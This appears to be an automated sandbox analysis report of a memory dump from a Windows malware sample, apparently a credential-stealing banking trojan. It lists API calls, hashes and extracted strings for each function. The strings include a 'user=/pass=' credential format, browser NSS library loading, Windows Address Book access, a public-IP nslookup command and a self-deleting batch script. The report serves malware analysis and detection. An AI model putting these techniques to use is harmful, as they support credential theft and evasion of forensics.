• Instruction ID: 97452728d926b8a7ad422259c58d23f3d61befa2f33902b2dfb932960cf0deb4
• Opcode Fuzzy Hash: 29f8d388390741cfd4e5b808a406e6b1fbca800b4618d9288bcc7e60e3ff9379
• Instruction Fuzzy Hash: D931BD75901218FEDB219F64CC44EAB7BB8EF48B40F114066F80897360F7B89D45CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044E261: RtlAllocateHeap.NTDLL(00000000,?), ref: 0044E293
  • Part of subcall function 0044E261: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,0044C2DA,?,00000022), ref: 0044E2B8
  • Part of subcall function 00443488: HeapFree.KERNEL32(00000000,00000000,?), ref: 004434C2
  • Part of subcall function 00443488: HeapFree.KERNEL32(00000000,?,?,00000001), ref: 0044350E
• lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C330
• lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C338
• lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C342
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0044C357
• wsprintfA.USER32 ref: 0044C38C
• HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000,?,00000022), ref: 0044C3AE
• HeapFree.KERNEL32(00000000,00000022,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C3C3
• HeapFree.KERNEL32(00000000,?,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C3D0
• HeapFree.KERNEL32(00000000,?,?,0000001C,?,?,00000022), ref: 0044C3DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$Free$lstrlen$Allocate$wsprintf
• String ID: URL: %suser=%spass=%s
• API String ID: 168057987-1589266237
• Opcode ID: 5d5cdb8051d829349e6e8a71bea8b1535d2ef6ecdfb0ed85dd36ed9a74858d44
• Instruction ID: 8c472d80faf159719e7c217d193dd87bd49916b722c0a9ad682eec1f1de5e101
• Opcode Fuzzy Hash: 5d5cdb8051d829349e6e8a71bea8b1535d2ef6ecdfb0ed85dd36ed9a74858d44
• Instruction Fuzzy Hash: 0931C431A05314BBD711AF659C41E5FBB98FF44754F00493EF944E22A1E7B58C14CB9A
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00449E33,00000000), ref: 0044FF8D
• RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0044FFA2
• memset.NTDLL ref: 0044FFAF
• HeapFree.KERNEL32(00000000,00000000,?,00449E32,?,?,00000000,?,00000000,0044AF60,?,00000000), ref: 0044FFCC
• memcpy.NTDLL(?,?,00449E32,?,00449E32,?,?,00000000,?,00000000,0044AF60,?,00000000), ref: 0044FFED
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$Allocate$Freememcpymemset
• String ID: Content-Length:$Referer: $Transfer-Encoding:$chun$pgF
• API String ID: 2362494589-685425981
• Opcode ID: 0276f8fac18944732805618d6924968f5c4122ab0400bb8b0183f722fbf68924
• Instruction ID: b7ab0f0a25eb42edab88195a3b415eafe304f738fa456ab34a52ade14745348e
• Opcode Fuzzy Hash: 0276f8fac18944732805618d6924968f5c4122ab0400bb8b0183f722fbf68924
• Instruction Fuzzy Hash: B831AE35600701AFE7309F66DC40B27BBE8EF14B15F00442BE94A972A1E778E949CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0044DB41
• RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0044DBF2
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0044DB8F
• GetProcAddress.KERNEL32(00000000,WABOpen), ref: 0044DBA1
• GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0044DBC0
• FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0044DBD2
• GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0044DBDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
• String ID: Software\Microsoft\WAB\DLLPath$WABOpen$^nF
• API String ID: 1628847533-1244126046
• Opcode ID: 630eeb2855bbedc8be6f7af6c1aaa3f287d55518f572331aaccbd4be5854d47a
• Instruction ID: e451f9cdd334a8846d494f837c36c138c9b143c1102adc1dd06a7003204196a3
• Opcode Fuzzy Hash: 630eeb2855bbedc8be6f7af6c1aaa3f287d55518f572331aaccbd4be5854d47a
• Instruction Fuzzy Hash: 4E21F531D00294FFEB216BA59C48D9FBF7CFB85700B22056BF802A7210EAB46D00DB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0045B50C,?,?,00000000), ref: 0045D8F1
• _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 0045D907
• _snwprintf.NTDLL ref: 0045D92C
• CreateFileMappingW.KERNEL32(000000FF,0046E0F8,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 0045D948
• GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C,?), ref: 0045D95A
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,00000000,54D38000,00000192), ref: 0045D971
• CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C), ref: 0045D992
• GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C,?), ref: 0045D99A
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
• String ID: Local\
• API String ID: 1814172918-422136742
• Opcode ID: 004159ff2f4068b618555d6180361aa9968ee980a69032f92d37550dfb373975
• Instruction ID: 6d1c51f7b28db09d6ebebba8bc289862c7449a0a9b0bca2f9b484d2ff3780ba8
• Opcode Fuzzy Hash: 004159ff2f4068b618555d6180361aa9968ee980a69032f92d37550dfb373975
• Instruction Fuzzy Hash: E72127B2A40204FBD720EB65CC05F8E77B9AF44701F214136FA05E72D1EAB499098B6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(NSPR4.DLL,?,00000000,00000000,00452C2E,00000000,74B5F5B0,0044BAA6,61636F4C,00000001,?,?), ref: 0045DDA8
• LoadLibraryA.KERNEL32(NSS3.DLL), ref: 0045DDB6
• LoadLibraryA.KERNEL32(xul.dll), ref: 0045DDCB
• GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 0045DDD9
• GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 0045DDE6
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: LibraryLoad$AddressProc
• String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
• API String ID: 1469910268-282796573
• Opcode ID: 13d138fe1337c5b0da291081579ba441c46a393ffab70c75e6ed13c70756fa19
• Instruction ID: 0c032d4c084d317348f1bfe213b0d7fa86985051dcb24e61ce5fea65ff10c6c2
• Opcode Fuzzy Hash: 13d138fe1337c5b0da291081579ba441c46a393ffab70c75e6ed13c70756fa19
• Instruction Fuzzy Hash: C2215871F412109BC325EF6EEC86A4577E4AB99711B10003BE418D73A1FBF888058B5E
Uniqueness

Uniqueness Score: -1.00%

APIs
• StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,004579BB,00000000,?,?,?), ref: 0045B00F
• StrChrA.SHLWAPI(00000001,00000020,?,?,?,004579BB,00000000,?,?,?), ref: 0045B020
  • Part of subcall function 0044407A: lstrlen.KERNEL32(?), ref: 0044408C
  • Part of subcall function 0044407A: StrChrA.SHLWAPI(?,0000000D), ref: 004440C4
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0045B059
• memcpy.NTDLL(00000000,http://,00000007,?,?,?,004579BB,00000000), ref: 0045B07F
• memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,004579BB,00000000), ref: 0045B08E
• memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,004579BB,00000000), ref: 0045B0A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: memcpy$AllocateHeaplstrlen
• String ID: Host:$http://$https://
• API String ID: 1819133394-2811860193
• Opcode ID: 16c2a4d5193939640236b72863c569b14a339a6b75c616028462f7eb6bbd3420
                                                                                                                                        • Instruction ID: 54a1fcce1564334dd82a6fe0322ed71d55e0b4a44e38c45b0c7b3ed12defd848
                                                                                                                                        • Opcode Fuzzy Hash: 16c2a4d5193939640236b72863c569b14a339a6b75c616028462f7eb6bbd3420
                                                                                                                                        • Instruction Fuzzy Hash: D5215071A00208BBDB119A95CC45F9BBBACDF04754F144062FD04DA292E7B4DE488B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(?,00461363), ref: 0044A718
                                                                                                                                          • Part of subcall function 00442D6E: InterlockedExchange.KERNEL32(?,000000FF), ref: 00442D75
                                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF,000000FF,?), ref: 0044A732
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044A73B
                                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 0044A749
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0044A755
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0044A77E
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0044A78D
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0044A79A
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0044A7A8
                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 0044A7B2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1408595562-0
                                                                                                                                        • Opcode ID: c0da907ea231392dabc080bc3f3a1d2cd238a25fa3dc153afc5ce6d89ccf8530
                                                                                                                                        • Instruction ID: 906ec0706832aff12669af5e96a993e08fb1e84f29d336387f648b24863c9eab
                                                                                                                                        • Opcode Fuzzy Hash: c0da907ea231392dabc080bc3f3a1d2cd238a25fa3dc153afc5ce6d89ccf8530
                                                                                                                                        • Instruction Fuzzy Hash: BE11ACB1180615EFEB306F61DC8894B77B8BF047013054A2EF54292661EB78E814CB2A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 0045F31C
                                                                                                                                        • StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 0045F339
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045F36F
                                                                                                                                        • RtlImageNtHeader.NTDLL(?), ref: 0045F39D
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,?,?), ref: 0045F460
                                                                                                                                          • Part of subcall function 0044D57C: lstrlen.KERNEL32(?,?,ss: *.*.*.*,00000000,0045380B,00000000,?,?,?,?,000000FF,?,00000F00), ref: 0044D585
                                                                                                                                          • Part of subcall function 0044D57C: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,000000FF,?,00000F00), ref: 0044D5A8
                                                                                                                                          • Part of subcall function 0044D57C: memset.NTDLL ref: 0044D5B7
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0045F40D
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0045F43E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                                                                                                        • String ID: TorClient
                                                                                                                                        • API String ID: 239510280-3399603969
                                                                                                                                        • Opcode ID: c4ea089fc2b69a4d0b8726af36594152bfb2e46848dc1d304ba09499484852ab
                                                                                                                                        • Instruction ID: 73432d6a326130add326797fa383e13419b0e3ebefb26f4b7951bc5416a65daa
                                                                                                                                        • Opcode Fuzzy Hash: c4ea089fc2b69a4d0b8726af36594152bfb2e46848dc1d304ba09499484852ab
                                                                                                                                        • Instruction Fuzzy Hash: 6041E531604341ABE7116F25EC45F2B77A9AB55716F04043AFD44A62A2EBF88C4C875F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000001,00000000,00000000,74B05520,0044F634,74B05520,00000001,@ID@,x2F,?), ref: 00453906
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00453916
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045394A
                                                                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00453975
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 00453994
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 004539F5
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00453A17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                                                                                                        • String ID: W
                                                                                                                                        • API String ID: 3204852930-655174618
                                                                                                                                        • Opcode ID: 1999589962fb351fd5080ef06c280a5b3899424377da9502019eac2186cac85d
                                                                                                                                        • Instruction ID: aa98c9228dd412364ac10b006f011ddae0e373a182ca82c7951474505704372a
                                                                                                                                        • Opcode Fuzzy Hash: 1999589962fb351fd5080ef06c280a5b3899424377da9502019eac2186cac85d
                                                                                                                                        • Instruction Fuzzy Hash: E44149B1900209EFCF01CF95CC80AAE7BB8FF04386F14442AED0497212E7759E58DBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 00462C2A
                                                                                                                                          • Part of subcall function 0045AF73: lstrlenW.KERNEL32(00000000,00000000,00000000,%APPDATA%\Microsoft\,?), ref: 0045AF98
                                                                                                                                          • Part of subcall function 0045AF73: RtlAllocateHeap.NTDLL(00000000,?), ref: 0045AFAA
                                                                                                                                          • Part of subcall function 0045AF73: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0045AFC7
                                                                                                                                          • Part of subcall function 0045AF73: lstrlenW.KERNEL32(00000000), ref: 0045AFD3
                                                                                                                                          • Part of subcall function 0045AF73: HeapFree.KERNEL32(00000000,00000000), ref: 0045AFE7
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 00462C62
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00462C70
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,.dll,00000000,00001000,00000000,00000000,?), ref: 00462D28
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00462D37
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,.dll,00000000,00001000,00000000,00000000,?), ref: 00462D4A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                                                                                                        • String ID: .dll$.exe
                                                                                                                                        • API String ID: 1719504581-724907077
                                                                                                                                        • Opcode ID: b05c265982c1a11c56ebb87c6c3b37fd6bdf8aa95f5538bab1aff7088bc5209b
                                                                                                                                        • Instruction ID: c61a4349f486c9a52036521e9830da2c0a594668447ace91356192626860b2e5
                                                                                                                                        • Opcode Fuzzy Hash: b05c265982c1a11c56ebb87c6c3b37fd6bdf8aa95f5538bab1aff7088bc5209b
                                                                                                                                        • Instruction Fuzzy Hash: C1419435A00A05FBDB219F95CE84B9F77B9AB44704F00412AF504A6260FBF8DD45CB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(0046DF6C), ref: 0045A4BA
                                                                                                                                        • lstrcpy.KERNEL32(00000000), ref: 0045A4EF
                                                                                                                                          • Part of subcall function 00449C8C: lstrlen.KERNEL32(?,00000008,00000000,?,74B05520,00458DBF,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00449C9B
                                                                                                                                          • Part of subcall function 00449C8C: mbstowcs.NTDLL ref: 00449CB7
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0045A580
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045A597
                                                                                                                                        • InterlockedDecrement.KERNEL32(0046DF6C), ref: 0045A5AE
                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0045A5CF
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0045A5DF
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                                                                                                                        • String ID: .avi
                                                                                                                                        • API String ID: 908044853-1706533258
                                                                                                                                        • Opcode ID: c001a98e0b54f8f2a2bb2f3540ea9634388201219c03133568abd6ea4d0e519f
                                                                                                                                        • Instruction ID: 787e777f6c29e830c685f40bd343b16c91a0bc8f9dfbc640ad267b47394975fa
                                                                                                                                        • Opcode Fuzzy Hash: c001a98e0b54f8f2a2bb2f3540ea9634388201219c03133568abd6ea4d0e519f
                                                                                                                                        • Instruction Fuzzy Hash: 5A312731E00118FBCB115BA5DC04AAE7BB4AB48752F114526FD04A7151F6B88E54979B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • memset.NTDLL ref: 00447833
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000008), ref: 004478AB
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004478C3
                                                                                                                                        • GetLastError.KERNEL32(0045A5EE,?,?), ref: 004478DB
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 004478E7
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004478F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocateErrorHeapLastmemset
                                                                                                                                        • String ID: \lF$flF
                                                                                                                                        • API String ID: 2000578454-3831591296
                                                                                                                                        • Opcode ID: 0cfcbccf9dffd48cf970620a4086cc42b979e56d3cd24ad874cd8b9a45764545
                                                                                                                                        • Instruction ID: 1db1a5eeaf458502f3fa6b2da34754c85af0ed4f3cdc76f410a518e14e151946
                                                                                                                                        • Opcode Fuzzy Hash: 0cfcbccf9dffd48cf970620a4086cc42b979e56d3cd24ad874cd8b9a45764545
                                                                                                                                        • Instruction Fuzzy Hash: A841AEB0900305AFE721DF65CC44BAABBF8FF08354F10862EE949D7290E7B49A04CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
  • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
  • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
  • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
  • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
• lstrlen.KERNEL32(00000000,?,00000F00), ref: 00453771
  • Part of subcall function 00463BCF: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,0045378E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00463BE0
  • Part of subcall function 00463BCF: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,0045378E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00463BE7
  • Part of subcall function 00463BCF: RtlAllocateHeap.NTDLL(00000000,?), ref: 00463BF9
  • Part of subcall function 00463BCF: _snprintf.NTDLL ref: 00463C1C
  • Part of subcall function 00463BCF: _snprintf.NTDLL ref: 00463C45
  • Part of subcall function 00463BCF: HeapFree.KERNEL32(00000000,?,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 00463C66
• StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 004537FD
• HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 0045381A
• DeleteFileA.KERNEL32(00000000,00000000,?,?,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00453822
• HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF,?,00000F00), ref: 00453831
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
• String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
• API String ID: 2960378068-949792001
• Opcode ID: 9e30d47c2ae4e748a412c0164ad8467bcf44356c5ecc200bfbda780fee3ca880
• Instruction ID: 808dacf112bdea08f110dfcf402dec1fe8ff1abd4db522f1aa0d7afd3a28eefd
• Opcode Fuzzy Hash: 9e30d47c2ae4e748a412c0164ad8467bcf44356c5ecc200bfbda780fee3ca880
• Instruction Fuzzy Hash: 1E218171E00145BBDB10AFE9CC84FDF7BECAB19316F00056AF505E2242FBB49A048769
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.NTDLL(00000000), ref: 00454A5E
• lstrcmpiW.KERNEL32(00000000,0065002E,?,00000000), ref: 00454A95
• lstrcmpiW.KERNEL32(?,0064002E,?,00000000), ref: 00454AAA
• lstrlenW.KERNEL32(?,?,00000000), ref: 00454AB1
• CloseHandle.KERNEL32(?,?,00000000), ref: 00454AD9
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00454B05
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 00454B22
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
• String ID: \gF
• API String ID: 1496873005-803477251
• Opcode ID: 8fcc9364d18a24dd33c7c0092bea8c200630e2fc08b77972956b61c093787658
• Instruction ID: 92d177b37b88ed936741aa5b2635aebb05f845d91f2d313e806c5373e26e1049
• Opcode Fuzzy Hash: 8fcc9364d18a24dd33c7c0092bea8c200630e2fc08b77972956b61c093787658
• Instruction Fuzzy Hash: 362153B1A00205ABDB109FB1DC84E5F77BCEF4474AB040529E906D6212EBB8ED49CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(004589A2,00000000,`F,0046E280,?,?,004589A2,00450C92,?), ref: 0045D3A5
• RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0045D3BB
• lstrlen.KERNEL32(00450C92,?,?,004589A2,00450C92,?), ref: 0045D3C3
• RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045D3CF
• lstrcpy.KERNEL32(?,004589A2), ref: 0045D3E5
• HeapFree.KERNEL32(00000000,00000000,?,?,004589A2,00450C92,?), ref: 0045D439
• HeapFree.KERNEL32(00000000,?,?,?,004589A2,00450C92,?), ref: 0045D448
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateFreelstrlen$lstrcpy
• String ID: `F
• API String ID: 1531811622-3520748611
• Opcode ID: 294bc3b6bb2728956b59163e99a00399d6d25d6240baf4b2bbcdc50a4bd17408
• Instruction ID: b7a991f6ed582c13d384d4800fa79764190685b938b3b66994837e15337b2d89
• Opcode Fuzzy Hash: 294bc3b6bb2728956b59163e99a00399d6d25d6240baf4b2bbcdc50a4bd17408
• Instruction Fuzzy Hash: C6212931A04284BFEB224F68DC44F6B7F6AEF56310F044079EC4597262D7B5AC4AC769
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,00460CAA,00000000), ref: 004614EF
  • Part of subcall function 00447B3D: lstrcpy.KERNEL32(-000000FC,00000000), ref: 00447B77
  • Part of subcall function 00447B3D: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 00447B89
  • Part of subcall function 00447B3D: GetTickCount.KERNEL32 ref: 00447B94
  • Part of subcall function 00447B3D: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 00447BA0
  • Part of subcall function 00447B3D: lstrcpy.KERNEL32(00000000), ref: 00447BBA
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• lstrcpy.KERNEL32(00000000), ref: 0046151F
• wsprintfA.USER32 ref: 00461532
• GetTickCount.KERNEL32 ref: 00461547
• wsprintfA.USER32 ref: 00461555
  • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
• String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
• API String ID: 1152860224-2880143881
• Opcode ID: a84bcec2f03b1a87fc822622cb7985edadbac10971cde107262f743a6cdd5055
• Instruction ID: a98bf99beefbf30505a9040d5b2f1688c02d0bebbd50316eeacb6702129fe827
• Opcode Fuzzy Hash: a84bcec2f03b1a87fc822622cb7985edadbac10971cde107262f743a6cdd5055
• Instruction Fuzzy Hash: D511E7729013157BD210BB665C49E5F7A9CEF80755F05482FF946A2212EEBCAC0486BF
Uniqueness
Uniqueness Score: -1.00%

APIs
